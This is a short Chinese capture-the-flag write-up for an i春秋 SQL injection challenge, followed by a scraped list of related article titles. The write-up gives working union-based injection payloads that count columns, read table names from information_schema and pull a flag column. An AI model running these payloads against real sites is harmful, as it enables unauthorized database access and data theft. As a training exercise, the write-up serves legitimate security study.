i春秋之SQL注入-1
目录
注入点判断
字段判断
爆表
注入点判断
不难发现修改GET传参中id的值页面就不一样,而且当id=1' and 1=2时页面不正常
所以id就是注入点
字段判断
构建payload
inurl?id=1' order by x --+
当x=4的时候页面不正常,说明字段数为3,而且当id=4的时候页面也不正常
接着用联合注入,构建payload
inurl?id=-1' union select 1,2,3 --+
可以看到2和3的位置有回显
爆表
看一下当前数据库里的所有表名,构建payload
inurl?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = database() --+
可以看到有两表,接着看一下fl4g这个表里的字段有啥,构建payload
好了,知道字段名跟表名,我们来看一下字段里有啥,构建payload
inurl?id=-1' union select 1,2,group_concat(fllllag) from fl4g --+
拿到flag
i春秋之SQL注入-1相关推荐
- 【sql注入教程】SQL注入是什么?我们如何去玩转它
[sql注入教程]SQL注入是什么?我们如何去玩转它 本文转自:i春秋社区 SQL注入攻击是黑客攻击数据库最常见手段之一.简单讲,SQL注入攻击是黑客利用网站程序漏洞,通过提交精心构造的SQL语句 ...
- i春秋2020新春公益赛 GYCTF有关SQL注入题复现
0x00 前言 最近这段时间参加过一些CTF在线竞赛,做过一些Web题,发现SQL注入漏洞出现的频率可真高!不过在做题中也get到了一些Web新知识,现在通过题目复现的方式总结一下. 0x01 bla ...
- 第一次CTF【后台登录、简单的sql注入之、简单的sql注入之2、猫抓老鼠、i春秋 文件上传】
后台登录 http://ctf5.shiyanbar.com/web/houtai/ffifdyop.php 根据md5($password,true)最后要得到原始二进制字符串,要含有or ,在or ...
- [春秋云镜wp]CVE-2022-28060 CVE-2022-26201 Victor CMS v1.0存在sql注入漏洞复现拿flag
CVE-2022-28060 访问题目提示的login.php,登录框登录抓包,保存为2.txt,sqlmap跑起来 python3 sqlmap.py -r 2.txt --file-read &q ...
- [网络安全提高篇] 一〇五.SQL注入之揭秘Oracle数据库注入漏洞和致命问题(联合Cream老师)
当您阅读到该篇文章时,作者已经将"网络安全自学篇"设置成了收费专栏,首先说声抱歉.感谢这一年来大家的阅读和陪伴,这100篇安全文章记录了自己从菜鸡到菜鸟的成长史,该部分知识也花了很 ...
- 【SQL注入】CTF练习题WriteUp——“百度杯”CTF比赛 九月场SQL
目录 1 前言 2 解题步骤 2.1 审题 2.2 判断注入数据类型及闭合方式 2.3 尝试联合查询注入 2.3.1 测试回显列数 2.3.2 测试显示位 2.3.3 爆库 3 总结 1 前言 本节内 ...
- 关于SQL注入,绕过逗号过滤
关于SQL注入,绕过逗号过滤 前言 题目 测试 解题 1.union联合注入 2.盲注 总结 前言 最近在i春秋遇到一道sqli题目,觉得很有意思,总结一下与大家分享. "百度杯" ...
- Python 网络爬虫2:第三方库requests 渗透脚本的编写(SQL注入的EXP,主机发现、端口扫描)
文章目录 Python 编写EXP requests库的使用 http方法 发送http请求 定制头部 超时 GET传参 POST传参 上传文件 COOKIE 使用爬虫爬取网页中所有课程的名字 使用p ...
- php mysql 防 sql注入_php 防sql注入方法
php防sql注入的方法:1.使用mysql_real_escape_string方法转义SQL语句中使用的字符串中的特殊字符:2.打开magic_quotes_gpc来防止SQL注入:3.通过自定义 ...
最新文章
- c3p0和jdbctemplate配置oracle集群rac,C3P0连接池、DRUID连接池和JdbcTemplate
- Oracle数据库的Sequence(序列)
- Java8————Lambda表达式(二)
- Mac OS X Tips
- C#winform程序窗口全屏是否遮盖任务栏问题
- java代码生成器,springboot代码生成器—增加生成添加信息,导出excel功能(持续更新)
- C语言:逆转线性链表
- STM32MP157 三角函数运算花费时间比较
- matlab画基因表达热图,科学网—使用pheatmap软件绘制基因表达热图 - 陈振玺的博文...
- python乒乓球比赛规则介绍_乒乓球比赛规则简单介绍
- phpmywind教程:单页信息调用说明【进阶篇一】
- node ref char*_「 volute 」树莓派+Node.js造一个有灵魂的语音助手
- 【python】使用pip安装指定版本的模块,卸载、查看、更新包
- Oracle时间函数 to_char()及常用时间格式
- dos命令为java程序赋值_在DOS命令行状态下,如果源程序HelloWorld.java在当前目录下,那么编译该程序的命令是() (5.0分)_学小易找答案...
- matlab弹幕抓取,B站某视频弹幕抓取
- 招商银行信用卡卡号识别项目(第一篇),Python OpenCV 图像处理取经之旅第 53 篇
- <<人性的弱点>>读后感
- python pandas 日期格式_python+pandas+时间、日期以及时间序列处理方法
- 基于Multisim的LC正弦波振荡器的设计与仿真
热门文章
- 【gradle】Android gradle版本降低 gradle 7.2 ---》gradle 5.4.1
- Gradle DEBUG调试
- 破坏力远超核弹?基辛格警告——
- 【网络流-最小割】USA4.4——追查坏牛奶Pollutant Control
- 抖音素人报价是多少,为什么企业都在做抖音推广
- ZeroMemory宏详解
- 计算机专业法语词汇,法语网络计算机相关词汇
- 计算机基础-分类介绍
- 目标检测的Tricks | 【Trick1】Label Smoothing
- WindowBlinds 6 下载 破解 (新)